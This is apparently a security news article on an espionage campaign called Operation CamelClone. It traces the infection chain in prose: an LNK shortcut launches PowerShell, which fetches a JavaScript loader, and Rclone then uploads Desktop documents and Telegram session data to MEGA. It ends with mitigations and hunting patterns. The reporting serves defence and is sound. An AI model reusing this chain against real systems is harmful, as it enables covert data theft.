A sophisticated espionage operation tracked as Operation CamelClone is actively targeting government, defense, and diplomatic organizations across Algeria, Mongolia, Ukraine, and Kuwait, using public file‑sharing infrastructure and the legitimate cloud tool Rclone to steal sensitive data.
First observed in late February 2026, the campaign surfaced when a suspicious ZIP archive named after Algeria’s Ministry of Housing, Urban Development, and the City was uploaded to VirusTotal on February 24. Soon after, a second lure aimed at Mongolia referenced “Expanding cooperation with China,” followed by additional samples themed around Algeria–Ukraine cooperation and a Kuwait Air Force procurement decoy—evidence of a wide, geopolitically aware targeting footprint.
Security researchers at Seqrite emphasize that, while the victim set seems geographically diverse, each country sits at a strategic junction in today’s geopolitical landscape—an alignment that strongly signals intelligence collection, not cybercrime for profit.
🎯 Targeting & Lures
Across all observed waves, spear‑phishing ZIP attachments mimic official government correspondence and embed a Windows shortcut (LNK) next to a convincing decoy image (e.g., Algerian ministry insignia, MonAtom LLC branding in Mongolia, or Kuwait Armed Forces crests). Opening the shortcut quietly triggers a PowerShell command that advances the infection without user awareness.
What makes CamelClone unusually stealthy is its absence of bespoke C2 servers. Payloads are hosted on the public file‑sharing site filebulldogs[.]com, while exfiltration runs through MEGA cloud storage—traffic that blends with normal enterprise activity and evades many network‑based detections.
🔗 Inside the Infection Chain
- LNK ➜ PowerShell ➜ HOPPINGANT
The LNK executes hidden PowerShell to download a JavaScript loader—HOPPINGANT—from filebulldogs[.]com and run it via Windows Script Host. - Dual PowerShell Stage & Decoys
HOPPINGANT launches two Base64‑encoded PowerShell commands: one fetches a null‑padded decoy PDF to distract the user; the other retrieves an archive (a.zip) containing a portable Rclone v1.70.3 binary. - Rclone‑Powered Data Theft
The script XOR‑decodes a stored password (key 56) to authenticate to a MEGA account registered with onionmail[.]org, then scans Desktop for .doc/.docx/.pdf/.txt files and uploads them to attacker storage. Telegram Desktop session data (tdata) is also targeted, potentially exposing private conversations. Researchers identified four MEGA accounts created in February–March 2026, suggesting parallel tasking across multiple ops.
This design—public hosting + cloud exfiltration + living‑off‑the‑land tools—avoids noisy infrastructure and leverages enterprise‑permitted services to persist and steal with minimal signals.
🌍 Why These Countries?
Seqrite’s analysis connects CamelClone’s victim set to timely strategic value:
- Ukraine amid ongoing armed conflict and hybrid activity;
- Algeria as a pivotal energy supplier straddling European–African–Russian interests;
- Mongolia balancing China–Russia influence while engaging Western partners;
- Kuwait as a key Gulf defense player.
The consistent lures—government letters, cooperation proposals, and defense procurement—mirror active policy lines, reinforcing an espionage objective.
🧪 Technical Highlights (at a Glance)
- Delivery: Spear‑phishing ZIP with LNK + official‑looking decoy image.
- Loader: HOPPINGANT JavaScript via Windows Script Host.
- Staging: Payloads on filebulldogs[.]com; no dedicated C2.
- Exfiltration: Rclone v1.70.3 to MEGA; credentials decoded (XOR key 56); onionmail[.]org accounts.
- Collections: Desktop .doc/.docx/.pdf/.txt; Telegram tdata sessions.
🛡 Recommended Mitigations
- Treat unsolicited ZIPs as hostile by default—especially those invoking ministries, foreign cooperation, or procurement themes. Implement file‑type controls and sandbox detonation for archives with LNK content.
- Block or restrict anonymous file‑sharing sites (e.g., filebulldogs[.]com) and apply egress filtering for MEGA and similar cloud storage—alert on new/rare destinations and bulk uploads.
- Constrain LNK execution from untrusted paths via AppLocker/WDAC and harden PowerShell (Constrained Language Mode, Script Block Logging, AMSI). Behavior‑based EDR should flag chained LNK ➜ PowerShell ➜ WSH patterns.
- Hunt for HOPPINGANT & Rclone usage
- Look for PowerShell fetching .js from filebulldogs[.]com.
- Detect portable Rclone binaries launching with MEGA remotes.
- Alert on XOR‑style key decoding routines and Telegram tdata access.
- User awareness for diplomatic & defense teams
Tailor training to government‑themed lures, emphasizing the risk of ZIP/LNK open rates and how to report suspicious “official” correspondence.
Conclusion
Operation CamelClone exemplifies modern cloud‑enabled espionage: credible government lures, public file‑sharing for staging, and Rclone‑to‑MEGA exfiltration that blends with normal traffic. The uniform infection chain, geopolitically tuned decoys, and disciplined use of commodity tools underline a campaign designed for quiet persistence and scalable theft—not smash‑and‑grab cybercrime.
Security teams in government, defense, and diplomatic environments should tighten controls on archive/shortcut files, curb access to anonymous hosting sites, and instrument detection for the precise LNK→PowerShell→WSH→Rclone sequence CamelClone depends on.
